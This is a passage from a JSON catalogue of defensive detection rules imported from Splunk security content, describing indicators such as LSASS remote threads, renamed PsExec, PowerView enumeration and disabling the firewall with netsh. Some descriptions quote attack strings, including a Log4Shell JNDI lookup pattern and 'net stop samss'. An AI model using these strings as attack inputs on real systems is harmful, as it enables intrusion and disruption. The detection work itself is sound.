connection sequence is a critical phase of RDP where the client and server exchange settings and establish common parameters for the session. Monitoring these events can help identify unusual RDP connection patterns, potential lateral movement attempts, unauthorized remote access activity, and RDP connection chains that may indicate compromised systems. 
NOTE the analytic was written for Multi-Line as XML was not properly parsed out.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdpclient-connection-sequence-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67340df1-3f1d-4470-93c8-9ac7249d11b0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdpclient_connection_sequence_events.yml" } }, { "id": "splunk-security-content-676b600a-a94d-4951-b346-11329431e6c1", "type": "detection", "name": "GetDomainController with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainController` commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet is part of PowerView, a tool often used for domain enumeration. The detection leverages script block text to identify this specific activity. Monitoring this behavior is crucial as it may indicate an adversary or Red Team performing reconnaissance to map out domain controllers. 
If confirmed malicious, this activity could lead to further domain enumeration, potentially exposing sensitive information and aiding in lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincontroller-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "676b600a-a94d-4951-b346-11329431e6c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincontroller_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-67740bd3-1506-469c-b91d-effc322cc6e5", "type": "detection", "name": "GetWmiObject Ds Group with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` commandlet with the `DS_Group` parameter via PowerShell Script Block Logging (EventCode=4104). This method leverages WMI to query all domain groups. Monitoring this activity is crucial as adversaries and Red Teams may use it for domain group enumeration, aiding in situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to map out the domain structure, potentially leading to further exploitation and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-group-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67740bd3-1506-469c-b91d-effc322cc6e5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_group_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-67bd3def-c41c-4bf6-837b-ae196b4257c6", "type": "detection", "name": "Detect AWS Console Login by User from New Country", "description": "The following analytic identifies AWS console login events by users from a new country. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen users and their login locations. This activity is significant because logins from new countries can indicate potential unauthorized access or compromised accounts. 
If confirmed malicious, this could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67bd3def-c41c-4bf6-837b-ae196b4257c6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_country.yml" } }, { "id": "splunk-security-content-67d2a52e-a7e2-4a5d-ae44-a21212048bc2", "type": "detection", "name": "Windows Process Commandline Discovery", "description": "The following analytic detects the use of Windows Management Instrumentation Command-line (WMIC) to retrieve information about running processes, specifically targeting the command lines used to launch those processes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on logs containing process details and command-line executions. This activity is significant as it may indicate suspicious behavior, such as a user or process gathering detailed process information, which is uncommon for non-technical users. 
If confirmed malicious, this could allow an attacker to gain insights into running processes, aiding in further exploitation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-commandline-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67d2a52e-a7e2-4a5d-ae44-a21212048bc2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_commandline_discovery.yml" } }, { "id": "splunk-security-content-67d4dbef-9564-4699-8da8-03a151529edc", "type": "detection", "name": "Create Remote Thread into LSASS", "description": "The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS). This behavior is identified using Sysmon EventID 8 logs, focusing on processes that create remote threads in lsass.exe. This activity is significant because it is commonly associated with credential dumping, a tactic used by adversaries to steal user authentication credentials. If confirmed malicious, this could allow attackers to gain unauthorized access to sensitive information, leading to potential compromise of the entire network. 
Analysts should investigate to differentiate between legitimate tools and potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-remote-thread-into-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67d4dbef-9564-4699-8da8-03a151529edc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_remote_thread_into_lsass.yml" } }, { "id": "splunk-security-content-683e6196-b8e8-11eb-9a79-acde48001122", "type": "detection", "name": "Detect Renamed PSExec", "description": "The following analytic identifies instances where `PsExec.exe` has been renamed and executed on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because renaming `PsExec.exe` is a common tactic to evade detection. 
If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access, lateral movement, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "683e6196-b8e8-11eb-9a79-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_psexec.yml" } }, { "id": "splunk-security-content-683f48de-982f-4a7e-9aac-9cec550da498", "type": "detection", "name": "Windows Alternate DataStream - Base64 Content", "description": "The following analytic detects the creation of Alternate Data Streams (ADS) with Base64 content on Windows systems. It leverages Sysmon EventID 15, which captures file creation events, including the content of named streams. ADS can conceal malicious payloads, making them significant for SOC monitoring. This detection identifies hidden streams that may contain executables, scripts, or configuration data, often used by malware to evade detection. 
If confirmed malicious, this activity could allow attackers to hide and execute payloads, persist in the environment, or access sensitive information without being easily detected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-base64-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "683f48de-982f-4a7e-9aac-9cec550da498", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___base64_content.yml" } }, { "id": "splunk-security-content-68469fd0-1315-44ba-b7e4-e92847bb76d6", "type": "detection", "name": "O365 New Email Forwarding Rule Created", "description": "The following analytic identifies the creation of new email forwarding rules in an Office 365 environment. It detects events logged under New-InboxRule and Set-InboxRule operations within the o365_management_activity data source, focusing on parameters like ForwardTo, ForwardAsAttachmentTo, and RedirectTo. This activity is significant as unauthorized email forwarding can lead to data exfiltration and unauthorized access to sensitive information. 
If confirmed malicious, attackers could intercept and redirect emails, potentially compromising confidential communications and leading to data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-email-forwarding-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68469fd0-1315-44ba-b7e4-e92847bb76d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_email_forwarding_rule_created.yml" } }, { "id": "splunk-security-content-6860a62c-9203-11eb-9e05-acde48001122", "type": "detection", "name": "Disabling Firewall with Netsh", "description": "The following analytic identifies the disabling of the firewall using the netsh application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include keywords like \"firewall,\" \"off,\" or \"disable.\" This activity is significant because disabling the firewall can expose the system to external threats, allowing malware to communicate with its command and control (C2) server. 
If confirmed malicious, this action could lead to unauthorized data exfiltration, further malware downloads, and broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-firewall-with-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6860a62c-9203-11eb-9e05-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_firewall_with_netsh.yml" } }, { "id": "splunk-security-content-68a0056c-34cb-455f-b03d-df935ea62c4f", "type": "detection", "name": "Network Traffic to Active Directory Web Services Protocol", "description": "The following analytic identifies network traffic directed to the Active Directory Web Services Protocol (ADWS) on port 9389. It leverages network traffic logs, focusing on source and destination IP addresses, application names, and destination ports. This activity is significant as ADWS is used to manage Active Directory, and unauthorized access could indicate malicious intent. 
If confirmed malicious, an attacker could manipulate Active Directory, potentially leading to privilege escalation, unauthorized access, or persistent control over the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-traffic-to-active-directory-web-services-protocol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68a0056c-34cb-455f-b03d-df935ea62c4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_traffic_to_active_directory_web_services_protocol.yml" } }, { "id": "splunk-security-content-68cbc9e9-2882-46f2-b636-3b5080589d58", "type": "detection", "name": "Windows BitLockerToGo Process Execution", "description": "The following analytic detects BitLockerToGo.exe execution, which has been observed being abused by Lumma stealer malware. The malware leverages this legitimate Windows utility to manipulate registry keys, search for cryptocurrency wallets and credentials, and exfiltrate sensitive data. This activity is significant because BitLockerToGo.exe provides functionality for viewing, copying, and writing files as well as modifying registry branches - capabilities that the Lumma stealer exploits. 
However, note that if BitLockerToGo.exe is legitimately used in the organization, this detection will generate false positives and should be tuned accordingly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlockertogo-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68cbc9e9-2882-46f2-b636-3b5080589d58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlockertogo_process_execution.yml" } }, { "id": "splunk-security-content-68d3e2c1-e97f-4310-b080-dea180b48aa9", "type": "detection", "name": "Zscaler Phishing Activity Threat Blocked", "description": "The following analytic identifies potential phishing attempts blocked by Zscaler within a network. It leverages web proxy logs to detect actions tagged as HTML.Phish. The detection method involves analyzing critical data points such as user, threat name, URL, and hostname. This activity is significant for a SOC as it serves as an early warning system for phishing threats, enabling prompt investigation and mitigation. 
If confirmed malicious, this activity could indicate an attempt to deceive users into divulging sensitive information, potentially leading to data breaches or credential theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-phishing-activity-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68d3e2c1-e97f-4310-b080-dea180b48aa9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_phishing_activity_threat_blocked.yml" } }, { "id": "splunk-security-content-68fe4efa-bbbb-44ee-9f09-d07d2f0f346b", "type": "detection", "name": "ESXi SSH Brute Force", "description": "This detection identifies signs of SSH brute-force attacks by monitoring for a high number of failed login attempts within a short time frame. 
Such activity may indicate an attacker attempting to gain unauthorized access through password guessing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-ssh-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68fe4efa-bbbb-44ee-9f09-d07d2f0f346b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_ssh_brute_force.yml" } }, { "id": "splunk-security-content-69078d8c-0de6-45de-bb00-14e78e042fd6", "type": "detection", "name": "GitHub Organizations Disable Dependabot", "description": "The following analytic detects when a user disables Dependabot security features within a GitHub repository. Dependabot helps automatically identify and fix security vulnerabilities in dependencies. The detection monitors GitHub Enterprise logs for configuration changes that disable Dependabot functionality. This behavior could indicate an attacker attempting to prevent the automatic detection of vulnerable dependencies, which would allow them to exploit known vulnerabilities that would otherwise be patched. For a SOC, identifying the disabling of security features like Dependabot is critical as it may be a precursor to supply chain attacks where attackers exploit vulnerable dependencies. 
The impact could be severe if vulnerabilities remain unpatched, potentially leading to code execution, data theft, or other compromises through the software supply chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-dependabot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69078d8c-0de6-45de-bb00-14e78e042fd6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_dependabot.yml" } }, { "id": "splunk-security-content-69201633-30d9-48ef-b1b6-e680805f0582", "type": "detection", "name": "Windows Admon Group Policy Object Created", "description": "The following analytic detects the creation of a new Group Policy Object (GPO) using Splunk's Admon data. It identifies events where a new GPO is created, excluding default \"New Group Policy Object\" entries. Monitoring GPO creation is crucial as adversaries can exploit GPOs to escalate privileges or deploy malware across an Active Directory network. 
If confirmed malicious, this activity could allow attackers to control system configurations, deploy ransomware, or propagate malware, significantly compromising the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admon-group-policy-object-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69201633-30d9-48ef-b1b6-e680805f0582", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admon_group_policy_object_created.yml" } }, { "id": "splunk-security-content-692226f1-84e3-4f63-a747-d53e65699608", "type": "detection", "name": "Windows Default RDP File Creation By Non MSTSC Process", "description": "This detection monitors the creation or modification of the Default.rdp file (typically found in the user's Documents folder) by a process other than mstsc.exe. This file is automatically generated or updated by the Remote Desktop Connection client (mstsc.exe) when a user initiates an RDP session. It stores connection settings such as the last-used hostname, screen size, and other preferences. The presence or update of this file strongly suggests that an RDP session has been launched from the system. 
Since this file is commonly overlooked, it can serve as a valuable artifact in identifying remote access activity, including potential lateral movement or attacker-controlled sessions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-creation-by-non-mstsc-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "692226f1-84e3-4f63-a747-d53e65699608", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_creation_by_non_mstsc_process.yml" } }, { "id": "splunk-security-content-6923cd64-17a0-453c-b945-81ac2d8c6db9", "type": "detection", "name": "Protocols passing authentication in cleartext", "description": "The following analytic identifies the use of cleartext protocols that risk leaking sensitive information. It detects network traffic on legacy protocols such as Telnet (port 23), POP3 (port 110), IMAP (port 143), and non-anonymous FTP (port 21). The detection leverages the Network_Traffic data model to identify TCP traffic on these ports. Monitoring this activity is crucial as it can expose credentials and other sensitive data to interception. 
If confirmed malicious, attackers could capture authentication details, leading to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/protocols-passing-authentication-in-cleartext.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6923cd64-17a0-453c-b945-81ac2d8c6db9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/protocols_passing_authentication_in_cleartext.yml" } }, { "id": "splunk-security-content-6947c44e-be1f-4dd9-b198-bc42be5be196", "type": "detection", "name": "Windows Modify Registry ValleyRat PWN Reg Entry", "description": "The following analytic detects modifications to the Windows Registry specifically targeting `.pwn` file associations related to the ValleyRAT malware. ValleyRAT may create or alter registry entries to associate `.pwn` files with malicious processes, allowing it to execute harmful scripts or commands when these files are opened. By monitoring for unusual changes in registry keys linked to `.pwn` extensions, this detection enables security analysts to identify potential ValleyRAT infection attempts. 
Early detection of these modifications helps mitigate unauthorized execution and prevents further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-valleyrat-pwn-reg-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6947c44e-be1f-4dd9-b198-bc42be5be196", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_valleyrat_pwn_reg_entry.yml" } }, { "id": "splunk-security-content-695aceae-21db-4e7f-93ac-a52e39d02b93", "type": "detection", "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", "description": "The following analytic detects potential exploitation of the Adobe ColdFusion vulnerability, CVE-2023-26360, which allows unauthenticated arbitrary file read.\nIt monitors POST requests to the \"/cf_scripts/scripts/ajax/ckeditor/*\" endpoint using the Web datamodel.\nThis activity can be significant due to the vulnerability's high CVSS score of 9.8, indicating severe risk.\nIf confirmed malicious, it could lead to unauthorized data access, further attacks, or severe operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/adobe-coldfusion-unauthenticated-arbitrary-file-read.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "695aceae-21db-4e7f-93ac-a52e39d02b93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/adobe_coldfusion_unauthenticated_arbitrary_file_read.yml" } }, { "id": "splunk-security-content-696694df-5706-495a-81f2-79501fa11b90", "type": "detection", "name": "SSL Certificates with Punycode", "description": "The following analytic detects SSL certificates with Punycode domains in the SSL issuer email domain, identified by the prefix \"xn--\". It leverages the Certificates Datamodel to flag these domains and uses CyberChef for decoding. This activity is significant as Punycode can be used for domain spoofing and phishing attacks. 
If confirmed malicious, attackers could deceive users and systems, potentially leading to unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ssl-certificates-with-punycode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "696694df-5706-495a-81f2-79501fa11b90", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/ssl_certificates_with_punycode.yml" } }, { "id": "splunk-security-content-697eb4c0-1008-4c3c-b5ae-7bd9b39adbd6", "type": "detection", "name": "Windows ComputerDefaults Spawning a Process", "description": "The following analytic detects the spawning of ComputerDefaults.exe, a Windows system process used to manage default application associations. While normally legitimate, this process can be exploited by attackers to bypass User Account Control (UAC) and execute unauthorized code with elevated privileges. Detection focuses on abnormal execution patterns, unusual parent-child process relationships, or deviations from standard paths. Such behavior may indicate attempts to modify system defaults or run malicious scripts undetected. 
Monitoring ComputerDefaults.exe is critical to identify potential security threats, prevent privilege escalation, and maintain system integrity by distinguishing normal operations from suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computerdefaults-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "697eb4c0-1008-4c3c-b5ae-7bd9b39adbd6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computerdefaults_spawning_a_process.yml" } }, { "id": "splunk-security-content-69934363-e1dd-4c49-8651-9d7663dd4d2f", "type": "detection", "name": "Windows Account Discovery for Sam Account Name", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser, specifically querying for \"samaccountname\" and \"pwdlastset\" attributes. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to gather user account information from Active Directory, which is a common reconnaissance step in lateral movement or privilege escalation attacks. 
If confirmed malicious, this activity could allow an attacker to map out user accounts, potentially leading to further exploitation and unauthorized access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-for-sam-account-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69934363-e1dd-4c49-8651-9d7663dd4d2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_for_sam_account_name.yml" } }, { "id": "splunk-security-content-69afee44-5c91-11ec-bf1f-497c9a704a72", "type": "detection", "name": "Log4Shell JNDI Payload Injection with Outbound Connection", "description": "The following analytic detects Log4Shell JNDI payload injections via outbound connections. It identifies suspicious LDAP lookup functions in web logs, such as `${jndi:ldap://PAYLOAD_INJECTED}`, and correlates them with network traffic to known malicious IP addresses. This detection leverages the Web and Network_Traffic data models in Splunk. Monitoring this activity is crucial as it targets vulnerabilities in Java web applications using log4j, potentially leading to remote code execution. 
If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise sensitive data within the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-jndi-payload-injection-with-outbound-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69afee44-5c91-11ec-bf1f-497c9a704a72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml" } }, { "id": "splunk-security-content-69c12d59-d951-431e-ab77-ec426b8d65e6", "type": "detection", "name": "Windows Security Account Manager Stopped", "description": "The following analytic detects the stopping of the Windows Security Account Manager (SAM) service via command-line, typically using the \"net stop samss\" command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because stopping the SAM service can disrupt authentication mechanisms and is often associated with ransomware attacks like Ryuk. 
